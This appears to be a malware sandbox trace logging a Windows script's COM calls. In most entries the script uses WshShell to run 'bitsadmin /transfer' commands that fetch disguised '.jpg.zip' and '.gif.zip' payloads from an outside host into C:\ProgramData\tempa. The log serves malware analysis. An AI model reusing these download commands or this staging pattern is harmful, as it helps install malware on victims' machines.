[0059.694] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\0131refor.log", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\0131refor.log", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0x1d9, wReserved2=0xeb58, wReserved3=0xc, varVal1=0x0, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0059.694] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0059.695] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10012) returned 0x0
[0059.695] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0059.695] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10012, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\marxvxinhhm64.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\marxvxinhhm64.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0x0, wReserved1=0x1d9, wReserved2=0xeb58, wReserved3=0xc, varVal1=0x800a0035, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x800a0035), puArgErr=0xceab4*=0x7e400) returned 0x80020009
[0059.695] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0059.695] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0059.696] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0059.696] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\marxvxinhhmdwwn.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\marxvxinhhmdwwn.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0x9f7, wReserved2=0xe874, wReserved3=0xc, varVal1=0x0, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0059.696] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0059.697] WshShell:IDispatch:GetIDsOfNames (in: This=0x2c5b1c, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xce75c*="run", cNames=0x1, lcid=0x409, rgDispId=0xce780 | out: rgDispId=0xce780*=1000) returned 0x0
[0059.698] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhma.jpg.zip?18841737 C:\\ProgramData\\tempa\\marxvxinhhma.jpg", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhma.jpg.zip?18841737 C:\\ProgramData\\tempa\\marxvxinhhma.jpg", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0063.146] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0063.147] WshShell:IDispatch:GetIDsOfNames (in: This=0x2c5b1c, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xce75c*="run", cNames=0x1, lcid=0x409, rgDispId=0xce780 | out: rgDispId=0xce780*=1000) returned 0x0
[0063.148] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmb.jpg.zip?607484307 C:\\ProgramData\\tempa\\marxvxinhhmb.jpg", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmb.jpg.zip?607484307 C:\\ProgramData\\tempa\\marxvxinhhmb.jpg", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0064.068] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0064.069] WshShell:IDispatch:GetIDsOfNames (in: This=0x2c5b1c, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xce75c*="run", cNames=0x1, lcid=0x409, rgDispId=0xce780 | out: rgDispId=0xce780*=1000) returned 0x0
[0064.070] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmc.jpg.zip?105185218 C:\\ProgramData\\tempa\\marxvxinhhmc.jpg", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmc.jpg.zip?105185218 C:\\ProgramData\\tempa\\marxvxinhhmc.jpg", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0064.939] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0064.940] WshShell:IDispatch:GetIDsOfNames (in: This=0x2c5b1c, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xce75c*="run", cNames=0x1, lcid=0x409, rgDispId=0xce780 | out: rgDispId=0xce780*=1000) returned 0x0
[0064.941] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdwwn.gif.zip?918109560 C:\\ProgramData\\tempa\\marxvxinhhmdwwn.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdwwn.gif.zip?918109560 C:\\ProgramData\\tempa\\marxvxinhhmdwwn.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0066.518] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0066.520] WshShell:IDispatch:GetIDsOfNames (in: This=0x2c5b1c, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xce75c*="run", cNames=0x1, lcid=0x409, rgDispId=0xce780 | out: rgDispId=0xce780*=1000) returned 0x0
[0066.520] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdx.gif.zip?258277672 C:\\ProgramData\\tempa\\marxvxinhhmdx.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdx.gif.zip?258277672 C:\\ProgramData\\tempa\\marxvxinhhmdx.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0068.609] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0068.611] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhme.jpg.zip?231938807 C:\\ProgramData\\tempa\\marxvxinhhme.jpg", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhme.jpg.zip?231938807 C:\\ProgramData\\tempa\\marxvxinhhme.jpg", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0069.421] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0069.421] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmf.jpg.zip?161905089 C:\\ProgramData\\tempa\\marxvxinhhmf.jpg", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmf.jpg.zip?161905089 C:\\ProgramData\\tempa\\marxvxinhhmf.jpg", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0070.299] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0070.300] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmg.gif.zip?491458574 C:\\ProgramData\\tempa\\marxvxinhhmg.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmg.gif.zip?491458574 C:\\ProgramData\\tempa\\marxvxinhhmg.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0071.880] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0071.880] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmgx.gif.zip?482400544 C:\\ProgramData\\tempa\\marxvxinhhmgx.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmgx.gif.zip?482400544 C:\\ProgramData\\tempa\\marxvxinhhmgx.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0072.852] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
[0072.853] WshShell:IDispatch:Invoke (in: This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxa.gif.zip?747193115 C:\\ProgramData\\tempa\\marxvxinhhmxa.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738, puArgErr=0xce734 | out: pDispParams=0xce724*(rgvarg=([0]=0xce6c8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), [1]=0xce6d8*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x3fe6b3e7), [2]=0xce6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxa.gif.zip?747193115 C:\\ProgramData\\tempa\\marxvxinhhmxa.gif", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xce738*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xce734*=0x0) returned 0x0
[0073.741] WshShell:IUnknown:Release (This=0x2c5b1c) returned 0x1
